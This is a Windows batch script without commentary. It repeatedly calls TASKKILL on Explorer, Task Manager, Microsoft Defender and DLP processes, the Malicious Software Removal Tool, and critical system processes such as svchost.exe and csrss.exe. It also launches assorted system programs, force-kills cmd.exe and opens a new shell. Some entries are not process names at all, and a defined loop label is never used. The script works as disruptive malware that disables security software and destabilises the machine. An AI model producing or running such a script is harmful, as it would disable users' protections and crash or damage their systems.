@echo off
:loop
TASKKILL /IM Explorer.exe
TASKKILL /IM OneDrive.exe
TASKKILL /IM OneDrive.App.exe
TASKKILL /IM Taskmgr.exe
TASKKILL /IM MpDefenderCoreService.exe
TASKKILL /IM MipDlp.exe
TASKKILL /IM DlpUserAgent.exe
TASKKILL /IM DlpUserAgent.exe
TASKKILL /IM mpextms.exe
TASKKILL /IM MsMpEng.exe
TASKKILL /IM Manager.exe
TASKKILL /IM ManagerService.exe
TASKKILL /IM sudo.exe
TASKKILL /IM subst.exe
TASKKILL /IM svchost.exe
TASKKILL /IM stordiag.exe
TASKKILL /IM ssText3d.scr
TASKKILL /IM SrTasks.exe
TASKKILL /IM srdelayed.exe
TASKKILL /IM agentactivationruntimestarter.exe
TASKKILL /IM AggregatorHost.exe
TASKKILL /IM aitstatic.exe
TASKKILL /IM alg.exe
TASKKILL /IM AppHostRegistrationVerifier.exe
TASKKILL /IM appidcertstorecheck.exe
TASKKILL /IM appidpolicyconverter.exe
TASKKILL /IM appidtel.exe
TASKKILL /IM AppInstallerBackgroundUpdate.exe
TASKKILL /IM ApplicationFrameHost.exe
TASKKILL /IM ApplyTrustOffline.exe
TASKKILL /IM ApproveChildRequest.exe
TASKKILL /IM appverif.chm
TASKKILL /IM appverif.exe
TASKKILL /IM ARP.EXE
TASKKILL /IM at.exe
TASKKILL /IM attrib.exe
TASKKILL /IM AtBroker.exe
TASKKILL /IM auditpol.exe
TASKKILL /IM AuthHost.exe
TASKKILL /IM AutoCatHost.exe
TASKKILL /IM autofstx.exe
TASKKILL /IM autochk.exe
TASKKILL /IM AxInstUI.exe
TASKKILL /IM azman.msc
TASKKILL /IM backgroundTaskHost.exe
TASKKILL /IM BackgroundTransferHost.exe
TASKKILL /IM bcdboot.exe
TASKKILL /IM bcdedit.exe
TASKKILL /IM BdeUISrv.exe
TASKKILL /IM bdeunlock.exe
TASKKILL /IM BioIso.exe
TASKKILL /IM BitLockerDeviceEncryption.exe
TASKKILL /IM BitLockerWizardElev.exe
TASKKILL /IM bitsadmin.exe
TASKKILL /IM bootim.exe
TASKKILL /IM bootsect.exe
TASKKILL /IM bridgeunattend.exe
TASKKILL /IM browser_broker.exe
TASKKILL /IM browserexport.exe
TASKKILL /IM bthudtask.exe
start "" "C:\Windows\System32\Bubbles.scr"
TASKKILL /IM ByteCodeGenerator.exe
TASKKILL /IM cacls.exe
TASKKILL /IM calc.exe
TASKKILL /IM CameraSettingsUIHost.exe
TASKKILL /IM CastSrv.exe
TASKKILL /IM cert.pfx
TASKKILL /IM CertEnrollCtrl.exe
TASKKILL /IM certlm.msc
TASKKILL /IM certmgr.msc
TASKKILL /IM certreq.exe
TASKKILL /IM certutil.exe
TASKKILL /IM charmap.exe
TASKKILL /IM changepk.exe
TASKKILL /IM chcp.com
TASKKILL /IM CheckNetIsolation.exe
TASKKILL /IM chkdsk.exe
TASKKILL /IM chkntfs.exe
TASKKILL /IM choice.exe
TASKKILL /IM CIDiag.exe
TASKKILL /IM cipher.exe
TASKKILL /IM CiTool.exe
TASKKILL /IM cleanmgr.exe
TASKKILL /IM clip.exe
TASKKILL /IM cliconfg.exe
TASKKILL /IM ClipRenew.exe
TASKKILL /IM ClipUp.exe
TASKKILL /IM ClipUpgrade.exe
TASKKILL /IM CloudExperienceHostBroker.exe
TASKKILL /IM CloudNotifications.exe
TASKKILL /IM cmdkey.exe
TASKKILL /IM cmdl32.exe
TASKKILL /IM cmmon32.exe
TASKKILL /IM cmstp.exe
TASKKILL /IM cofire.exe
TASKKILL /IM cob-au.rs
start "" "C:\Windows\System32\colorcpl.exe"
TASKKILL /IM colorcpl.exe
TASKKILL /IM comp.exe
TASKKILL /IM compact.exe
TASKKILL /IM CompatTelRunner.exe
TASKKILL /IM compmgmt.msc
TASKKILL /IM CompMgmtLauncher.exe
TASKKILL /IM CompPkgSrv.exe
TASKKILL /IM ComputerDefaults.exe
TASKKILL /IM conhost.exe
TASKKILL /IM consent.exe
TASKKILL /IM control.exe
TASKKILL /IM convert.exe
TASKKILL /IM convertvhd.exe
TASKKILL /IM coredpussvr.exe
TASKKILL /IM CredentialEnrollmentManager.exe
TASKKILL /IM CredentialUIBroker.exe
TASKKILL /IM credwiz.exe
start "" "C:\Windows\System32\cscript.exe"
TASKKILL /IM csrss.exe
start "" "C:\Windows\System32\ctfmon.exe"
start "" "C:\Windows\System32\cttune.exe"
start "" "C:\Windows\System32\cttunesvr.exe"
start "" "C:\Windows\System32\CustomInstallExec.exe"
TASKKILL /IM d3dconfig.exe
TASKKILL /IM dasHost.exe
TASKKILL /IM DataExchangeHost.exe
TASKKILL /IM DataStoreCacheDumpTool.exe
TASKKILL /IM ddodiag.exe
TASKKILL /IM Defrag.exe
TASKKILL /IM deploymentcsphelper.exe
TASKKILL /IM DeviceCensus.exe
TASKKILL /IM DeviceCredentialDeployment.exe
TASKKILL /IM DeviceEnroller.exe
TASKKILL /IM DevicePairingWizard.exe
TASKKILL /IM devmgmt.msc
TASKKILL /IM DevModeRunAsUserConfig.msc
TASKKILL /IM dfrgui.exe
TASKKILL /IM DFDWiz.exe
TASKKILL /IM dialer.exe
TASKKILL /IM help.exe
TASKKILL /IM MRT.exe
TASKKILL /F /IM cmd.exe /T
start "" "C:\Windows\System32\dvdplay.exe"
goto boby

:boby
start "" cmd /K "cd /d C:\ && "
